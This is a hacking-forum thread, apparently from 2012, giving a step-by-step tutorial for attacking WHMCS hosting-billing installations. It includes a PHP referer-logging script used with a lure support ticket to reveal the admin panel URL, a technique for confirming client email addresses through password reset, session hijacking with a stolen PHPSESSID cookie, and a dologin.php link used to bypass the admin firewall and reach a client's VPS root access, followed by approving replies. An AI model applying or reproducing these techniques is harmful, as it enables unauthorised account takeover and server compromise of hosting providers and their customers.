MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: WHMCS Trick'z With XSS And Ref Link & rOoTiNg wiTh0u7 pAnEL
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4
Hello Mad'z

How Are You Brother'z ?

Today ,,We're Going To Get Admin Panel Link OF WHMCS

We Need PHP File

PHP Code:
<?php 
# Admin Link Finder Via XSS 
# Don't Forget To Inject Code :) 
# WWW.SEC4EVER.COM 
#404 
echo "404 Page Not Found"
$url $_SERVER['HTTP_REFERER']; 
$urlx = @fopen("URL.txt","w"); 
@
fwrite($urlx,"====================================================================== 
URL/Admin Panel : 
$url 
====================================================================== 
"
); 
?>

This Code We Need .. Now Upload it For AnyServer And Just

Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message

Code:
Hello

I Need To Make Like This Site
http://site.tld/file.php

waiting support
thanks
H4x0r

oke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle

[Image: Nup09644.png]:P

This Was The 1st Trick xP

The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This

[Image: gxj10095.png]

So Here We're

We Want To Bypass This Firewall And Get Root To X Client Smiley1

Assume We've This Information

Cookiez

Code:
PHPSESSID=34820c5cad7Da21205091c36b749D085

E-Mail OF Client


We Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection Smiley1 That's Not Matter
E-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target

Now We've To Check if The Email Address Is correct or incorrect

Request Reset Password

[Image: Ked10893.png]
And Here Put E-Mail To Check


if you get message with E-Mail Sent ,, So E-Mail Address is Correct

[Image: yM310980.png]
E-Mail Is Correct Smiley1 # Zuhahah =))

Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon

[Image: nAZ11269.png]
[Image: f5T11298.png]

Create C00kie And Put As We've Then Type F5

And You'll Get iN The Top of Page

[Image: eGO11421.png]

But The Problem Now We Can't Access Admin Panel Sadsmiley Because OF Fire Wall

Oke Our Magic Is found Tonguesmiley

Now Use This Link

http://site.tld/whmcs/dologin.php?u s e r n a m [email protected]

Don't Use Spaces In u$ername But I Used Because OF Security

So You'll Be In ClientArea Now Tonguesmiley

[Image: CZW12352.png]
Discover The Services And Product'z

[Image: zUz12272.png]

It's VPS Tonguesmiley Go 2 View Detail'z

[Image: 8ix12498.png]

Root Access Is ready =))

Just Say Zuhahahaha Tonguesmiley

Zuhahahaha ,,, We Got it Greet'z

h4x0rl1f3
shadow008
1337
Dr.Zombie
KhantastiC
TNT_HACKER
Th3 MMA
Zombie_KSA
Spiral
I-Hmx
Sec4ever
MadLeets

./b0x
Www://MadLeets.CoM
Hahahahahahahahahahahahaha
Just Awesome Bro Biggrinsmiley
That's way to sexy and full with Madness UnderTaker wink
Awesome shit wink
Aweso0000me Biggrinsmiley
Awesome tut. Biggrinsmiley
Great B0x Biggrinsmiley
1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
(09-26-2012, 07:10 PM)darksnipper Wrote: [ -> ]1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
well 99 % register users can submit, so you don't need to actually buy anything just register on web with fake info and submit wink
enjoy
okz thanx let me try it Smiley1

1 mre questioN
MUST THE WHMCS Vul to xsS?

1 mre questioN
MUST THE WHMCS Vul to xsS?
its a GOD gifted exploit and its very nice bro
thanks Tonguesmiley
Pages: 1 2 3 4